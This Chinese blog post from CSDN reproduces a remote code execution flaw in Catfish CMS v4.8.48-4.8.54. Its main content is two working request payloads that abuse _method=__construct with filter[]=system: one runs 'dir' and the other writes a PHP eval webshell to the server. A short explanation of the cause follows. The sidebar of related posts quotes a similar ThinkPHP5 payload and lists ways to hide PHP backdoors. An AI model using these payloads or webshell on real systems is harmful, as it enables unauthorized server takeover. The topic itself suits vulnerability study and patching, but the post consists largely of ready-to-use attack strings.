catfish V4.8.48-4.8.54 前台getshell复现过程

最新推荐文章于 2024-07-16 09:28:46 发布
最新推荐文章于 2024-07-16 09:28:46 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: 练题 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45821250/article/details/121913618
版权

在这里插入图片描述
s=dir&filter[]=system&_method=__construct&method=*
在这里插入图片描述
s=echo “<?php @eval($_POST['attack']);?>” >camd.php&filter[]=system&_method=__construct&method=*
在这里插入图片描述
原理就是网站代码在设计时有两个函数可以相互传值,可以间接的把 __construct():构造函数/方法直接传进去执行,你看payload为什么会直接执行黑进去,就是因为在_method这个魔术常量没有审计用户会调用值进去。

看教程时几个关键点的知识点:
$user->friends_count
取对象的friends_count属性。

$t->homeTimeline($p)
调用对象的homeTimeline方法,方法中传入一个参数$p

if我是菜鸡
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用CMS漏洞渗透并获取某服务器权限
wodafa的博客
03-14 1万+
phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在phpMyAdmin,且获取了root帐号和密码,但无法执行load_file或者说无法导出webshell到服务器上,在这种情况下就需要充分利用既有CMS漏洞,通过CMS漏洞来获取webshell。目前使用流行架构,特别是一键式部署的系统
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7010
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
Catfishcms漏洞复现
小小猪的博客
12-21 1666
Catfishcms漏洞复现 环境搭建: Catfishcms v4.8.54环境搭建 漏洞复现: 代码审计: _method=__construct Request类(catfish/library/think/Request.php)用于处理请求,函数method用于获取请求的类型 application/config.php 中定义了“表单请求类型伪装变量”: POST请求参数 “ _method=__construct ”,将 __construct 传给了var_metho.
CatfishCMS任意命令执行导致getshell
云雕的博客
06-08 4874
CatfishCMS任意命令执行导致getshell目录一、 漏洞说明二、 漏洞测试三、漏洞修复: 目录 测试环境:windows + php5.4.45 +apache (phpStudy 集成环境) CMS 版本: v4.8.54(发布于2019年1月) 一、 漏洞说明 完整的payload为: s=dir&_method=__construct&method=*&fi...
Catfish CMS漏洞集合
weixin_30455661的博客
04-08 1450
转自https://larryxi.github.io/ 0x00 背景 版本:V 4.2.35 官网下载:http://www.catfish-cms.com/page/4.html 文章内容仅作学习参考,勿以恶小而为 0x01 任意文件删除 拿到一个cms进行安装后,首先比较喜欢看看其安装逻辑,查找有没有在安装流程中直接导致重装的可能性。由于系统是THINKPHP5开发的,...
Catfish CMS 鲶鱼内容管理系统 v4.8.54
10-04
Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统,适合于CMS、Blog、企业站等不同类型的网站建设。 自动识别CMS、Blog 等网站类型,只要简单的切换主题就可以完成网站类型的切换。 多语言
Catfish(鲶鱼) CMS v4.8.48
10-05
Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统,适合于CMS、Blog、企业站等不同类型的网站建设。 自动识别CMS、Blog 等网站类型,只要简单的切换主题就可以完成网站类型的切换。 多语言
Catfish(鲶鱼) CMS v4.8.75
10-01
Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统,适合于CMS、Blog、企业站等不同类型的网站建设。 自动识别CMS、Blog 等网站类型,只要简单的切换主题就可以完成网站类型的切换。 多语言
Catfish(鲶鱼) CMS v4.8.45
10-05
Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统,适合于CMS、Blog、企业站等不同类型的网站建设。 自动识别CMS、Blog 等网站类型,只要简单的切换主题就可以完成网站类型的切换。 多语言
Catfish(鲶鱼) CMS v4.8.27
10-09
Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统,适合于CMS、Blog、企业站等不同类型的网站建设。 自动识别CMS、Blog 等网站类型,只要简单的切换主题就可以完成网站类型的切换。 多语言
thinkPHP5 最新代码执行漏洞
xiaoziabc的博客
01-13 2804
s=captcha _method=__construct&amp;filter[]=system&amp;method=get&amp;server[REQUEST_method]=dir   http://127.0.0.1/tp5.0.12_full/public/index.php?s=index/\think\app/invokefunction&amp;function=call...
thinkphp5 RCE漏洞复现
feng的博客
03-03 3410
前言 之前看的是tp3的SQL注入,现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE,毕竟thinkphp最广为人知的漏洞就是RCE。 首先是源码的下载,我从这里下载: thinkphp下载 这里我下载的是thinkphp5.0.22完整版,如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样,RCE的执行点也都是重要的request类。关键在于这个filterValue()函数: /** * 递归过滤给定的值 * @param mixe
Catfishcms v4.8.54环境搭建
小小猪的博客
12-21 472
Catfishcms v4.8.54环境搭建 源码下载: 链接:https://pan.baidu.com/s/1bitRu4triNjKTUHSgAB-Xg 提取码:c2ac phpstudy这里就不在讲述了,自行百度下载 将下载好的源码放进安装好后的phpstudy文件的WWW目录下 127.0.0.1+你解压之后的文件名即可进行安装 安装成功 前台界面 后台界面 ...
php隐藏后门,php如何隐藏后门
weixin_39603598的博客
03-09 262
php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名在 Windows 10下...
PHP代码审计——越权漏洞(Catfish(鲶鱼) CMS
W小哥
08-20 2743
一、代码审计 第一处越权 把id传递过来,进行一个where查询,没有验证用户直接查询 通过查询id值,可以查询不同用户的文章 第一处漏洞复现 首先在后台创建一个用户test01,然后以test01的身份登陆后台,编辑一篇测试文章 test01查看自己的测试文章,发现id的值为3 测试,将id修改为1、2,可以编辑admin账户的文章 第二处越权 通过get方式接收art参数的值,之后将art的值赋值给wzid,然后将id=wzid的值代入数据库select查询,也是没有验证用户的身份 第二处漏
鲶鱼java代码_Catfish(鲶鱼) Blog V1.3.15 代码审计
weixin_33246767的博客
02-26 362
Catfish(鲶鱼) Blog V1.3.15 代码审计1,前台存储型xss漏洞漏洞点:application\index\controller\index.php调用了filterJs函数对content 参数进行过滤。继续跟进filterJs函数:在/application/index/controller/Common.php文件中filterJs函数定义如下:protected func...
ns3-gym入门(二):linear-mesh例子详解
zoe2222226666的博客
07-15 893
学习ns3-gym中关于IEEE 802.11网状网络中控制随机接入的例子linear-mesh
【框架】PHP框架详解-symfony框架
最新发布
Xiaoxin的博客
07-16 826
1. 起源与开发者Symfony由SensioLabs(现为Symfony公司)开发,最初由Fabien Potencier于2005年创建。Symfony框架自发布以来,经历了多个版本的迭代,每个版本都引入了新的特性和改进,以满足不断变化的Web开发需求。2. 设计理念Symfony框架遵循MVC(Model-View-Controller)设计模式,将应用程序分为模型、视图和控制器三个核心部分,有助于实现代码的分离和重用。
常用的 shell 命令有: 1. ls - 列出目录中的文件和文件夹 2. cd - 更改当前工作目录 3. pwd - 显示当前工作目录的完整路径 4. cp - 复制文件或目录 5. mv - 移动或重命名文件或目录 6. rm - 删除文件或目录 7. echo - 向控制台输出文本 8. cat - 显示文件内容 9. mkdir - 创建目录 10. touch - 创建空文件 这只是常用的几个命令,还有许多其他命令可以满足不同的需求。
07-15
感谢你提供的常用的shell命令。除了这些常见的命令,还有一些其他常用的命令可以进一步扩展你的命令行工具的功能。这些命令包括: 11. grep - 在文件中搜索匹配的文本 12. find - 在目录中查找文件 13. chmod - ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值